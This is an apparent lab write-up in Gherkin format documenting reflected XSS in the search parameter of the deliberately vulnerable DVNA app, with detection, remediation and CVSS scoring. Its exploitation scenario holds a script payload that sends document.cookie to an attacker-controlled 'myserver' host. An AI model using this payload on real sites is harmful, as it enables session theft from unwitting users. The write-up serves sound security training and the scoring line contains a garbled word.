## Version 1.4.2
## language: en

Feature:
  TOE:
    DVNA
  Category:
    Information Leakage
  Location:
    /app/products - name (Parameter)
  CWE:
    CWE-0079: Improper Neutralization of Input During Web Page Generation
    ('Cross-site Scripting') -base-
      https://cwe.mitre.org/data/definitions/79.html
    CWE-0074: Improper Neutralization of Special Elements in Output Used by a
    Downstream Component ('Injection') -class-
      https://cwe.mitre.org/data/definitions/74.html
    CWE-0990: SFP Secondary Cluster: Tainted Input to Command -category-
      https://cwe.mitre.org/data/definitions/990.html
  CAPEC:
    CAPEC-591: Reflected XSS -detailed-
      http://capec.mitre.org/data/definitions/591.html
    CAPEC-063: Cross-Site Scripting (XSS) -standard-
      http://capec.mitre.org/data/definitions/63.html
    CAPEC-242: Code Injection -meta-
      http://capec.mitre.org/data/definitions/242.html
  Rule:
    REQ.173: https://fluidattacks.com/web/es/rules/173/
  Goal:
    Execute arbitrary JS in browser
  Recommendation:
    Sanitize user input, escape output

  Background:
  Hacker's software:
    | <Software name>       | <Version> |
    | Kali Linux            | 2017.3    |
    | Firefox Quantum       | 64.0b14   |
    | Burp Suite CE         | 1.7.36    |
  TOE information:
    Given I am running DVNA in a docker container at
    """
    http://localhost:8000/
    """

  Scenario: Normal use case
  Normal site navigation
    Given I go to http://localhost:8000/
    Then I can navigate the site

  Scenario: Static detection
  No access control
    Given I see the code at "/root/workbench/dvna/views/app/products.ejs"
    """
    18  <% if (output&&output.searchTerm) { %>
    19        <p class="bg-success">
    20            Listing products with <strong>search query: </strong> <%- outp
    ut.searchTerm %>
    21            &nbsp; &nbsp;
    22            <small><a href="/app/products">
    23                <i class="fa fa-remove"></i> Clear
    24            </a></small>
    25        </p>
    26  <% } %>
    """
    Then I see it's using "<%-" instead of "<%=" to output the searchterm param

  Scenario: Dynamic detection
  Fuzzing for xss
    Given I go to "http://localhost:8000/app/products"
    Then I click search product and enter into the search box
    """
    <script>alert(1)</script>
    """
    Then I get an alert box in the results page

  Scenario: Exploitation
  Stealing user cookies
    Given I know there's an xss vulnerability
    Then I trick a user into submitting to the search form
    """
    <script>document.location="http://myserver/cookiesteal?c="+document.cookie</
    script>
    """
    Then I steal the user's cookies

  Scenario: Remediation
  Access control
    Given I patch the code like this
    """
    18  <% if (output&&output.searchTerm) { %>
    19        <p class="bg-success">
    20            Listing products with <strong>search query: </strong> <%= outp
    ut.searchTerm %>
    21            &nbsp; &nbsp;
    22            <small><a href="/app/products">
    23                <i class="fa fa-remove"></i> Clear
    24            </a></small>
    25        </p>
    26  <% } %>
    """
    Then ejs escapes the search string and XSS is not posible anymore

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    6.3/10 (Medium) - AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N/
  Temporal: Attributes that measure the exploit's popularity and fixability
    5.9/10 (Medium) - E:F/RL:O/RC:C/
  En4.9onmental: Unique and relevant attributes to a specific user environment
    5.9/10 (Medium) - CR:M/IR:M/AR:M

  Scenario: Correlations
    No correlations have been found to this date 2019-01-25
